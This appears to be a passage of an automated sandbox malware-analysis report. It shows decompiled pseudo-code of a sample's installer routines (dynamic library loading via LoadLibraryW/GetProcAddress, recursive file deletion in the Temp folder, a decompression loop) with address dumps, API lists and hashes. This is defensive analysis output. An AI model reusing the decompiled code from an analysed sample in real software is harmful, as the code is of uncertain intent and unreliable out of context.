												__eflags = _v8 - 1;
												 *(__edi + 0x1028) = __edx;
												if(_v8 == 1) {
													__eax =  &_v12;
													__eax = E73331B86( &_v12);
													__eax = __eax + 1;
													__eflags = __eax;
													_v8 = __eax;
												}
												__eax = _v8;
												 *((intOrPtr*)(__edi + 0x101c)) = _v8;
												_t136 = _v16 + 0x81; // 0x81
												_t136 = _t136 << 5;
												__eax = 0;
												__eflags = 0;
												 *((intOrPtr*)((_t136 << 5) + __esi)) = 0;
												 *((intOrPtr*)(__edi + 0x1030)) = 0;
												 *((intOrPtr*)(__edi + 0x102c)) = 0;
												L97:
												__eflags = __ebx;
												if(__ebx == 0) {
													goto L57;
												}
												L98:
												__eflags = _v20;
												_v40 = 1;
												if(_v20 != 0) {
													L103:
													__eflags = _v20 - 1;
													if(_v20 == 1) {
														__eax = _v16;
														__eax = _v16 << 5;
														__eflags = __eax;
														 *(__eax + __esi + 0x102c) = __ebx;
													}
													goto L105;
												}
												_v16 = _v16 << 5;
												_t144 = __esi + 0x1030; // 0x1030
												__edi = (_v16 << 5) + _t144;
												__eax =  *__edi;
												__eflags = __eax - 0xffffffff;
												if(__eax <= 0xffffffff) {
													L101:
													__eax = GlobalFree(__eax);
													L102:
													 *__edi = __ebx;
													goto L103;
												}
												__eflags = __eax - 0x19;
												if(__eax <= 0x19) {
													goto L102;
												}
												goto L101;
											}
											__eflags = __edx;
											if(__edx > 0) {
												goto L94;
											}
											goto L93;
										case 0x22:
											goto L57;
									}
								}
								_t272 = _t269 - 1;
								__eflags = _t272;
								if(_t272 == 0) {
									_v16 = _t283;
									goto L80;
								}
								__eflags = _t272 != 1;
								if(_t272 != 1) {
									goto L162;
								}
								__eflags = _t286 - 0x6e;
								if(__eflags > 0) {
									_t309 = _t286 - 0x72;
									__eflags = _t309;
									if(_t309 == 0) {
										_push(4);
										L74:
										_pop(_t274);
										L75:
										__eflags = _v8 - 1;
										if(_v8 != 1) {
											_t96 = _t332 + 0x1010;
											 *_t96 =  *(_t332 + 0x1010) &  !_t274;
											__eflags =  *_t96;
										} else {
											 *(_t332 + 0x1010) =  *(_t332 + 0x1010) | _t274;
										}
										_v8 = 1;
										goto L57;
									}
									_t312 = _t309 - 1;
									__eflags = _t312;
									if(_t312 == 0) {
										_push(0x10);
										goto L74;
									}
									__eflags = _t312 != 0;
									if(_t312 != 0) {
										goto L57;
									}
									_push(0x40);
									goto L74;
								}
								if(__eflags == 0) {
									_push(8);
									goto L74;
								}
								_t315 = _t286 - 0x21;
								__eflags = _t315;
								if(_t315 == 0) {
									_v8 =  ~_v8;
									goto L57;
								}
								_t316 = _t315 - 0x11;
								__eflags = _t316;
								if(_t316 == 0) {
									_t274 = 0x100;
									goto L75;
								}
								_t317 = _t316 - 0x31;
								__eflags = _t317;
								if(_t317 == 0) {
									_t274 = 1;
									goto L75;
								}
								__eflags = _t317 != 0;
								if(_t317 != 0) {
									goto L57;
								}
								_push(0x20);
								goto L74;
							} else {
								_v32 = _t283;
								_v36 = _t283;
								goto L20;
							}
						}
						__eflags =  *((short*)(_t321 - 2)) - 0x3a;
						if( *((short*)(_t321 - 2)) != 0x3a) {
							goto L17;
						}
						__eflags = _v32 - _t283;
						if(_v32 == _t283) {
							goto L43;
						}
						goto L17;
					}
					_t277 = _t258 - 5;
					if(_t277 == 0) {
						__eflags = _v44 - _t283;
						if(_v44 != _t283) {
							goto L43;
						} else {
							__eflags = _v36 - 3;
							_v32 = 1;
							_v8 = _t283;
							_v20 = _t283;
							_v16 = (0 | _v36 == 0x00000003) + 1;
							_v40 = _t283;
							goto L20;
						}
					}
					_t281 = _t277 - 1;
					if(_t281 == 0) {
						__eflags = _v44 - _t283;
						if(_v44 != _t283) {
							goto L43;
						} else {
							_v32 = 2;
							_v8 = _t283;
							_v20 = _t283;
							goto L20;
						}
					}
					if(_t281 != 0x16) {
						goto L43;
					} else {
						_v32 = 3;
						_v8 = 1;
						goto L20;
					}
				}
				GlobalFree(_v56);
				GlobalFree(_v24);
				GlobalFree(_v48);
				if(_t332 == _t283 ||  *(_t332 + 0x100c) != _t283) {
					L182:
					return _t332;
				} else {
					_t225 =  *_t332 - 1;
					if(_t225 == 0) {
						_t187 = _t332 + 8; // 0x8
						_t324 = _t187;
						__eflags =  *_t324 - _t283;
						if( *_t324 != _t283) {
							_t226 = GetModuleHandleW(_t324); // executed
							__eflags = _t226 - _t283;
							 *(_t332 + 0x1008) = _t226;
							if(_t226 != _t283) {
								L171:
								_t192 = _t332 + 0x808; // 0x808
								_t325 = _t192;
								_t227 = E733316BD( *(_t332 + 0x1008), _t325);
								__eflags = _t227 - _t283;
								 *(_t332 + 0x100c) = _t227;
								if(_t227 == _t283) {
									__eflags =  *_t325 - 0x23;
									if( *_t325 == 0x23) {
										_t195 = _t332 + 0x80a; // 0x80a
										_t231 = E733313B1(_t195);
										__eflags = _t231 - _t283;
										if(_t231 != _t283) {
											__eflags = _t231 & 0xffff0000;
											if((_t231 & 0xffff0000) == 0) {
												 *(_t332 + 0x100c) = GetProcAddress( *(_t332 + 0x1008), _t231 & 0x0000ffff);
											}
										}
									}
								}
								__eflags = _v52 - _t283;
								if(_v52 != _t283) {
									L178:
									_t325[lstrlenW(_t325)] = 0x57;
									_t229 = E733316BD( *(_t332 + 0x1008), _t325);
									__eflags = _t229 - _t283;
									if(_t229 != _t283) {
										L166:
										 *(_t332 + 0x100c) = _t229;
										goto L182;
									}
									__eflags =  *(_t332 + 0x100c) - _t283;
									L180:
									if(__eflags != 0) {
										goto L182;
									}
									L181:
									_t206 = _t332 + 4;
									 *_t206 =  *(_t332 + 4) | 0xffffffff;
									__eflags =  *_t206;
									goto L182;
								} else {
									__eflags =  *(_t332 + 0x100c) - _t283;
									if( *(_t332 + 0x100c) != _t283) {
										goto L182;
									}
									goto L178;
								}
							}
							_t234 = LoadLibraryW(_t324);
							__eflags = _t234 - _t283;
							 *(_t332 + 0x1008) = _t234;
							if(_t234 == _t283) {
								goto L181;
							}
							goto L171;
						}
						_t188 = _t332 + 0x808; // 0x808
						_t236 = E733313B1(_t188);
						 *(_t332 + 0x100c) = _t236;
						__eflags = _t236 - _t283;
						goto L180;
					}
					_t237 = _t225 - 1;
					if(_t237 == 0) {
						_t185 = _t332 + 0x808; // 0x808
						_t238 = _t185;
						__eflags =  *_t238 - _t283;
						if( *_t238 == _t283) {
							goto L182;
						}
						_t229 = E733313B1(_t238);
						L165:
						goto L166;
					}
					if(_t237 != 1) {
						goto L182;
					}
					_t81 = _t332 + 8; // 0x8
					_t284 = _t81;
					_t326 = E733313B1(_t81);
					 *(_t332 + 0x1008) = _t326;
					if(_t326 == 0) {
						goto L181;
					}
					 *(_t332 + 0x104c) =  *(_t332 + 0x104c) & 0x00000000;
					 *((intOrPtr*)(_t332 + 0x1050)) = E733312CC(_t284);
					 *(_t332 + 0x103c) =  *(_t332 + 0x103c) & 0x00000000;
					 *((intOrPtr*)(_t332 + 0x1048)) = 1;
					 *((intOrPtr*)(_t332 + 0x1038)) = 1;
					_t90 = _t332 + 0x808; // 0x808
					_t229 =  *(_t326->i + E733313B1(_t90) * 4);
					goto L165;
				}
			}

0x73331c07
0x73331c0a
0x73331c0d
0x73331c10
0x73331c13
0x73331c16
0x73331c19
0x73331c1b
0x73331c1e
0x73331c21
0x73331c26
0x73331c29
0x73331c31
0x73331c39
0x73331c3b
0x73331c3e
0x73331c46
0x73331c46
0x73331c4b
0x73331c4e
0x00000000
0x00000000
0x73331c5b
0x73331c60
0x73331c62
0x73331cf4
0x73331cf4
0x73331cf4
0x73331cf8
0x73331cfb
0x73331cfd
0x73331d1f
0x73331d21
0x73331d24
0x73331d33
0x73331d35
0x73331d3b
0x73331d3b
0x73331d41
0x73331d44
0x73331d44
0x73331d47
0x73331d47
0x73331d4d
0x73331d4f
0x73331d4f
0x73331d51
0x73331d54
0x73331d57
0x73331d5d
0x73331d63
0x73331d66
0x73331d8a
0x73331d8d
0x00000000
0x00000000
0x73331d90
0x73331d92
0x73331da0
0x73331da3
0x73331da5
0x00000000
0x00000000
0x00000000
0x00000000
0x73331da7
0x73331da7
0x73331da7
0x73331dad
0x73331daf
0x00000000
0x00000000
0x73331db1
0x73331db3
0x73331db5
0x73331db7
0x00000000
0x00000000
0x00000000
0x73331db7
0x73331db9
0x73331dbb
0x73331dbd
0x73331dbd
0x73331dc3
0x73331dc9
0x73331dcb
0x73331ddf
0x73331ddf
0x73331de1
0x73331dcd
0x73331dd3
0x73331dd6
0x73331dd6
0x00000000
0x73331d68
0x73331d68
0x73331d68
0x73331d69
0x73331d71
0x73331d75
0x73331d7b
0x73331d7f
0x00000000
0x73331d7f
0x73331d6b
0x73331d6b
0x73331d6c
0x00000000
0x00000000
0x73331d6e
0x73331d6f
0x00000000
0x00000000
0x00000000
0x73331d6f
0x73331cff
0x73331d00
0x73331d09
0x73331d0c
0x73331d19
0x73331d19
0x73331d0e
0x73331d0e
0x73331de7
0x73331dea
0x73331dee
0x73331e61
0x73331e65
0x73331c43
0x00000000
0x73331c43
0x00000000
0x73331e65
0x73331cfd
0x73331c68
0x73331c6b
0x73331cce
0x73331cd1
0x73331ce3
0x73331ce3
0x73331ce6
0x73331df3
0x73331df6
0x73331df6
0x73331df8
0x733321ae
0x733321c6
0x733321c6
0x733321c9
0x00000000
0x00000000
0x733321b3
0x733321b4
0x733321b7
0x733321ba
0x73332244
0x7333224b
0x73332251
0x73332255
0x73331e5c
0x73331e5d
0x73331e5d
0x73331e5e
0x00000000
0x73331e5e
0x733321c0
0x733321c3
0x733321c3
0x733321cb
0x733321ce
0x73332238
0x73331e51
0x73331e54
0x73331e57
0x73331e5a
0x73331e5a
0x00000000
0x73331e5a
0x733321d0
0x733321d3
0x733321da
0x733321da
0x733321dd
0x733321e1
0x733321f5
0x733321f5
0x733321f8
0x733321fc
0x00000000
0x00000000
0x733321fe
0x73332202
0x00000000
0x00000000
0x73332204
0x7333220b
0x7333220b
0x73332211
0x73332214
0x73332230
0x73332216
0x7333221f
0x73332222
0x73332222
0x00000000
0x73332214
0x733321e3
0x733321e6
0x733321ea
0x00000000
0x00000000
0x733321ec
0x00000000
0x733321ec
0x733321d5
0x733321d8
0x00000000
0x00000000
0x00000000
0x733321d8
0x73331dfe
0x73331dfe
0x73331dff
0x73331f49
0x73331f49
0x73331f50
0x73331f53
0x00000000
0x00000000
0x73331f60
0x00000000
0x7333214b
0x7333214e
0x73332151
0x73332151
0x73332152
0x73332153
0x73332156
0x73332159
0x7333215c
0x00000000
0x00000000
0x7333215e
0x7333215e
0x73332162
0x7333217a
0x7333217d
0x73332181
0x73332187
0x00000000
0x73332187
0x73332164
0x73332164
0x73332167
0x00000000
0x00000000
0x73332169
0x7333216c
0x7333216e
0x7333216f
0x7333216f
0x7333216f
0x73332170
0x73332173
0x73332176
0x73332177
0x73332151
0x73332152
0x73332153
0x73332156
0x73332159
0x7333215c
0x00000000
0x00000000
0x00000000
0x7333215c
0x00000000
0x73331fa7
0x00000000
0x00000000
0x73331fb3
0x00000000
0x00000000
0x73331f9a
0x73331f9e
0x73331fa2
0x00000000
0x00000000
0x7333211c
0x73332120
0x00000000
0x00000000
0x73332126
0x7333212f
0x73332136
0x7333213e
0x00000000
0x00000000
0x73332083
0x73332083
0x00000000
0x00000000
0x73331fbc
0x00000000
0x00000000
0x733321a6
0x00000000
0x00000000
0x7333208b
0x7333208d
0x7333208d
0x00000000
0x00000000
0x73332196
0x00000000
0x00000000
0x7333219a
0x00000000
0x00000000
0x733321a2
0x00000000
0x00000000
0x733320d3
0x733320d5
0x733320d5
0x00000000
0x00000000
0x7333209d
0x7333209f
0x7333209f
0x00000000
0x00000000
0x733320af
0x733320b1
0x733320b1
0x00000000
0x00000000
0x733320e1
0x733320e3
0x733320e3
0x00000000
0x00000000
0x733320ba
0x733320bc
0x733320bc
0x00000000
0x00000000
0x733320c1
0x00000000
0x00000000
0x7333219e
0x733321a8
0x733321a8
0x00000000
0x00000000
0x733320ec
0x733320f0
0x733320f5
0x733320f8
0x733320f9
0x733320fc
0x73332102
0x73332102
0x00000000
0x00000000
0x7333218e
0x00000000
0x00000000
0x733320c5
0x733320c7
0x733320c7
0x00000000
0x00000000
0x73331fc3
0x73331fc3
0x00000000
0x00000000
0x733320da
0x733320dc
0x733320dc
0x00000000
0x00000000
0x73331f67
0x73331f6d
0x73331f70
0x73331f72
0x73331f72
0x73331f75
0x73331f79
0x73331f86
0x73331f88
0x73331f8e
0x73331f8e
0x73331f8e
0x00000000
0x00000000
0x7333208e
0x7333208e
0x73332090
0x73332097
0x00000000
0x00000000
0x733320d6
0x733320d6
0x00000000
0x00000000
0x733320a0
0x733320a0
0x733320a2
0x733320a9
0x00000000
0x00000000
0x733320b2
0x733320b2
0x733320b4
0x00000000
0x00000000
0x733320e4
0x733320e4
0x00000000
0x00000000
0x733320bd
0x733320bd
0x00000000
0x00000000
0x7333210a
0x7333210e
0x73332113
0x73332116
0x00000000
0x00000000
0x733320c8
0x733320c8
0x733320cb
0x733320cd
0x00000000
0x00000000
0x733320dd
0x733320dd
0x733320e6
0x733320e6
0x73331fc5
0x73331fc5
0x73331fc8
0x73331fcf
0x73331fd1
0x73331fd3
0x73331fda
0x73331fdd
0x73331fe2
0x73331fe4
0x73331fe6
0x73331fea
0x73331ff0
0x73331ff6
0x73331ff6
0x73331ff8
0x73331ff8
0x73331ff9
0x73331ff9
0x73331ffd
0x73332003
0x73332005
0x73332009
0x7333200e
0x7333200e
0x73332010
0x73332010
0x73332013
0x73332016
0x7333201f
0x73332025
0x73332028
0x73332028
0x7333202a
0x7333202d
0x73332033
0x73332039
0x73332039
0x7333203b
0x00000000
0x00000000
0x73332041
0x73332041
0x73332045
0x7333204c
0x73332070
0x73332070
0x73332074
0x73332076
0x73332079
0x73332079
0x7333207c
0x7333207c
0x00000000
0x73332074
0x73332051
0x73332054
0x73332054
0x7333205b
0x7333205d
0x73332060
0x73332067
0x73332068
0x7333206e
0x7333206e
0x00000000
0x7333206e
0x73332062
0x73332065
0x00000000
0x00000000
0x00000000
0x73332065
0x73331ff2
0x73331ff4
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x73331f60
0x73331e05
0x73331e05
0x73331e06
0x73331f46
0x00000000
0x73331f46
0x73331e0c
0x73331e0d
0x00000000
0x00000000
0x73331e13
0x73331e16
0x73331f0b
0x73331f0b
0x73331f0e
0x73331f23
0x73331f25
0x73331f25
0x73331f26
0x73331f29
0x73331f2c
0x73331f38
0x73331f38
0x73331f38
0x73331f2e
0x73331f2e
0x73331f2e
0x73331f3e
0x00000000
0x73331f3e
0x73331f10
0x73331f10
0x73331f11
0x73331f1f
0x00000000
0x73331f1f
0x73331f14
0x73331f15
0x00000000
0x00000000
0x73331f1b
0x00000000
0x73331f1b
0x73331e1c
0x73331f07
0x00000000
0x73331f07
0x73331e22
0x73331e22
0x73331e25
0x73331e4e
0x00000000
0x73331e4e
0x73331e27
0x73331e27
0x73331e2a
0x73331e44
0x00000000
0x73331e44
0x73331e2c
0x73331e2c
0x73331e2f
0x73331e3e
0x00000000
0x73331e3e
0x73331e32
0x73331e33
0x00000000
0x00000000
0x73331e35
0x00000000
0x73331cec
0x73331cec
0x73331cef
0x00000000
0x73331cef
0x73331ce6
0x73331cd3
0x73331cd8
0x00000000
0x00000000
0x73331cda
0x73331cdd
0x00000000
0x00000000
0x00000000
0x73331cdd
0x73331c6d
0x73331c70
0x73331ca6
0x73331ca9
0x00000000
0x73331caf
0x73331cb1
0x73331cb5
0x73331cbc
0x73331cc3
0x73331cc6
0x73331cc9
0x00000000
0x73331cc9
0x73331ca9
0x73331c72
0x73331c73
0x73331c8e
0x73331c91
0x00000000
0x73331c97
0x73331c97
0x73331c9e
0x73331ca1
0x00000000
0x73331ca1
0x73331c91
0x73331c78
0x00000000
0x73331c7e
0x73331c7e
0x73331c85
0x00000000
0x73331c85
0x73331c78
0x73331e74
0x73331e79
0x73331e7e
0x73331e82
0x73332355
0x7333235b
0x73331e94
0x73331e96
0x73331e97
0x7333227e
0x7333227e
0x73332281
0x73332284
0x733322a1
0x733322a7
0x733322a9
0x733322af
0x733322c6
0x733322c6
0x733322c6
0x733322d3
0x733322d9
0x733322dc
0x733322e2
0x733322e4
0x733322e8
0x733322ea
0x733322f1
0x733322f6
0x733322f9
0x733322fb
0x73332300
0x73332312
0x73332312
0x73332300
0x733322f9
0x733322e8
0x73332318
0x7333231b
0x73332325
0x7333232d
0x7333233a
0x73332340
0x73332343
0x73332273
0x73332273
0x00000000
0x73332273
0x73332349
0x7333234f
0x7333234f
0x00000000
0x00000000
0x73332351
0x73332351
0x73332351
0x73332351
0x00000000
0x7333231d
0x7333231d
0x73332323
0x00000000
0x00000000
0x00000000
0x73332323
0x7333231b
0x733322b2
0x733322b8
0x733322ba
0x733322c0
0x00000000
0x00000000
0x00000000
0x733322c0
0x73332286
0x7333228d
0x73332293
0x73332299
0x00000000
0x73332299
0x73331e9d
0x73331e9e
0x7333225d
0x7333225d
0x73332263
0x73332266
0x00000000
0x00000000
0x7333226d
0x73332272
0x00000000
0x73332272
0x73331ea5
0x00000000
0x00000000
0x73331eab
0x73331eab
0x73331eb4
0x73331eb9
0x73331ebf
0x00000000
0x00000000
0x73331ec5
0x73331ed2
0x73331ed8
0x73331ee2
0x73331ee8
0x73331ef0
0x73331f00
0x00000000
0x73331f00

APIs

Part of subcall function 733312BB: GlobalAlloc.KERNELBASE(00000040,?,733312DB,?,7333137F,00000019,733311CA,-000000A0), ref: 733312C5

GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 73331D2D
lstrcpyW.KERNEL32 ref: 73331D75
lstrcpyW.KERNEL32 ref: 73331D7F
GlobalFree.KERNEL32 ref: 73331D92
GlobalFree.KERNEL32 ref: 73331E74
GlobalFree.KERNEL32 ref: 73331E79
GlobalFree.KERNEL32 ref: 73331E7E
GlobalFree.KERNEL32 ref: 73332068
lstrcpyW.KERNEL32 ref: 73332222
GetModuleHandleW.KERNELBASE(00000008), ref: 733322A1
LoadLibraryW.KERNEL32(00000008), ref: 733322B2
GetProcAddress.KERNEL32(?,?), ref: 7333230C
lstrlenW.KERNEL32(00000808), ref: 73332326

Memory Dump Source

Source File: 00000000.00000002.773267858.0000000073331000.00000020.00000001.01000000.00000005.sdmp, Offset: 73330000, based on PE: true

Associated: 00000000.00000002.773256620.0000000073330000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.773280632.0000000073334000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.773288025.0000000073336000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73330000_3GJ6S3Kwnb.jbxd

Similarity

API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
String ID:
API String ID: 245916457-0
Opcode ID: 0c5607aa0ab2cd64dd0195fd2d7b9dd9556a48ee7f000f6d34e86d0645fd509d
Instruction ID: 4514cba9101ccad6840ffb91ce3dcd8928145d45f8f041a499396521913ef289
Opcode Fuzzy Hash: 0c5607aa0ab2cd64dd0195fd2d7b9dd9556a48ee7f000f6d34e86d0645fd509d
Instruction Fuzzy Hash: 30229C71D04209DFDB31AFA4C980BEEB7B8FB06315F94C62ED1A6E2294D7749581CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00405C13 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E00405C13(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				short _v556;
				short _v558;
				struct _WIN32_FIND_DATAW _v604;
				signed int _t38;
				signed int _t52;
				signed int _t55;
				signed int _t62;
				void* _t64;
				signed char _t65;
				WCHAR* _t66;
				void* _t67;
				WCHAR* _t68;
				void* _t70;

				_t65 = _a8;
				_t68 = _a4;
				_v8 = _t65 & 0x00000004;
				_t38 = E00405EDE(__eflags, _t68);
				_v12 = _t38;
				if((_t65 & 0x00000008) != 0) {
					_t62 = DeleteFileW(_t68); // executed
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					 *0x42a2a8 =  *0x42a2a8 + _t64;
					return _t64;
				}
				_a4 = _t65;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E00406507(0x425710, _t68);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405E22(_t68);
					} else {
						lstrcatW(0x425710, L"\\*.*");
					}
					__eflags =  *_t68;
					if( *_t68 != 0) {
						L10:
						lstrcatW(_t68, 0x40a014);
						L11:
						_t66 =  &(_t68[lstrlenW(_t68)]);
						_t38 = FindFirstFileW(0x425710,  &_v604); // executed
						_t70 = _t38;
						__eflags = _t70 - 0xffffffff;
						if(_t70 == 0xffffffff) {
							L26:
							__eflags = _a4;
							if(_a4 != 0) {
								_t30 = _t66 - 2;
								 *_t30 =  *(_t66 - 2) & 0x00000000;
								__eflags =  *_t30;
							}
							goto L28;
						} else {
							goto L12;
						}
						do {
							L12:
							__eflags = _v604.cFileName - 0x2e;
							if(_v604.cFileName != 0x2e) {
								L16:
								E00406507(_t66,  &(_v604.cFileName));
								__eflags = _v604.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t52 = E00405BCB(__eflags, _t68, _v8);
									__eflags = _t52;
									if(_t52 != 0) {
										E00405569(0xfffffff2, _t68);
									} else {
										__eflags = _v8 - _t52;
										if(_v8 == _t52) {
											 *0x42a2a8 =  *0x42a2a8 + 1;
										} else {
											E00405569(0xfffffff1, _t68);
											E004062C7(_t67, _t68, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405C13(__eflags, _t68, _a8);
									}
								}
								goto L24;
							}
							__eflags = _v558;
							if(_v558 == 0) {
								goto L24;
							}
							__eflags = _v558 - 0x2e;
							if(_v558 != 0x2e) {
								goto L16;
							}
							__eflags = _v556;
							if(_v556 == 0) {
								goto L24;
							}
							goto L16;
							L24:
							_t55 = FindNextFileW(_t70,  &_v604);
							__eflags = _t55;
						} while (_t55 != 0);
						_t38 = FindClose(_t70);
						goto L26;
					}
					__eflags =  *0x425710 - 0x5c;
					if( *0x425710 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t38;
					if(_t38 == 0) {
						L28:
						__eflags = _a4;
						if(_a4 == 0) {
							L36:
							return _t38;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t38 = E0040683D(_t68);
							__eflags = _t38;
							if(_t38 == 0) {
								goto L36;
							}
							E00405DD6(_t68);
							_t38 = E00405BCB(__eflags, _t68, _v8 | 0x00000001);
							__eflags = _t38;
							if(_t38 != 0) {
								return E00405569(0xffffffe5, _t68);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L30;
							}
							E00405569(0xfffffff1, _t68);
							return E004062C7(_t67, _t68, 0);
						}
						L30:
						 *0x42a2a8 =  *0x42a2a8 + 1;
						return _t38;
					}
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}

0x00405c1d
0x00405c22
0x00405c2b
0x00405c2e
0x00405c36
0x00405c39
0x00405c3c
0x00405c44
0x00405c46
0x00405c47
0x00000000
0x00405c47
0x00405c52
0x00405c55
0x00405c55
0x00405c55
0x00405c59
0x00405c6c
0x00405c73
0x00405c78
0x00405c7c
0x00405c8c
0x00405c7e
0x00405c84
0x00405c84
0x00405c91
0x00405c95
0x00405ca1
0x00405ca7
0x00405cac
0x00405cb2
0x00405cbd
0x00405cc3
0x00405cc5
0x00405cc8
0x00405d72
0x00405d72
0x00405d76
0x00405d78
0x00405d78
0x00405d78
0x00405d78
0x00000000
0x00000000
0x00000000
0x00000000
0x00405cce
0x00405cce
0x00405cce
0x00405cd6
0x00405cf6
0x00405cfe
0x00405d03
0x00405d0a
0x00405d25
0x00405d2a
0x00405d2c
0x00405d50
0x00405d2e
0x00405d2e
0x00405d31
0x00405d45
0x00405d33
0x00405d36
0x00405d3e
0x00405d3e
0x00405d31
0x00405d0c
0x00405d12
0x00405d14
0x00405d1a
0x00405d1a
0x00405d14
0x00000000
0x00405d0a
0x00405cd8
0x00405ce0
0x00000000
0x00000000
0x00405ce2
0x00405cea
0x00000000
0x00000000
0x00405cec
0x00405cf4
0x00000000
0x00000000
0x00000000
0x00405d55
0x00405d5d
0x00405d63
0x00405d63
0x00405d6c
0x00000000
0x00405d6c
0x00405c97
0x00405c9f
0x00000000
0x00000000
0x00000000
0x00405c5b
0x00405c5b
0x00405c5d
0x00405d7d
0x00405d7f
0x00405d82
0x00405dd3
0x00405dd3
0x00405dd3
0x00405d84
0x00405d87
0x00405d92
0x00405d97
0x00405d99
0x00000000
0x00000000
0x00405d9c
0x00405da8
0x00405dad
0x00405daf
0x00000000
0x00405dca
0x00405db1
0x00405db4
0x00000000
0x00000000
0x00405db9
0x00000000
0x00405dc0
0x00405d89
0x00405d89
0x00000000
0x00405d89
0x00405c63
0x00405c66
0x00000000
0x00000000
0x00000000
0x00405c66

APIs

DeleteFileW.KERNELBASE(?,?,76CDFAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405C3C
lstrcatW.KERNEL32(00425710,\*.*), ref: 00405C84
lstrcatW.KERNEL32(?,0040A014), ref: 00405CA7
lstrlenW.KERNEL32(?,?,0040A014,?,00425710,?,?,76CDFAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CAD
FindFirstFileW.KERNELBASE(00425710,?,?,?,0040A014,?,00425710,?,?,76CDFAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CBD
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D5D
FindClose.KERNEL32(00000000), ref: 00405D6C

Strings

., xrefs: 00405CE2
\*.*, xrefs: 00405C7E
., xrefs: 00405CCE
C:\Users\user\AppData\Local\Temp\, xrefs: 00405C20

Memory Dump Source

Source File: 00000000.00000002.771758418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.771749416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771772921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771816294.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771822433.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771834497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771843257.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771862430.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3GJ6S3Kwnb.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: .$.$C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-4130279798
Opcode ID: d9acfb67b6692fe63fef00afaeab71217e0c0e788268e2aa2b253bff87fc1474
Instruction ID: 7f21bfa76759dd048c017f5e8d67b30635c21f713a141b53f9c1cb2b61cba077
Opcode Fuzzy Hash: d9acfb67b6692fe63fef00afaeab71217e0c0e788268e2aa2b253bff87fc1474
Instruction Fuzzy Hash: BD419F30400A15BADB21AB619C8DAAF7B78EF41718F14817BF801721D1D77C4A82DEAE

Uniqueness

Uniqueness Score: -1.00%

Function 00406BFE Relevance: 5.4, APIs: 4, Instructions: 382
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E00406BFE() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
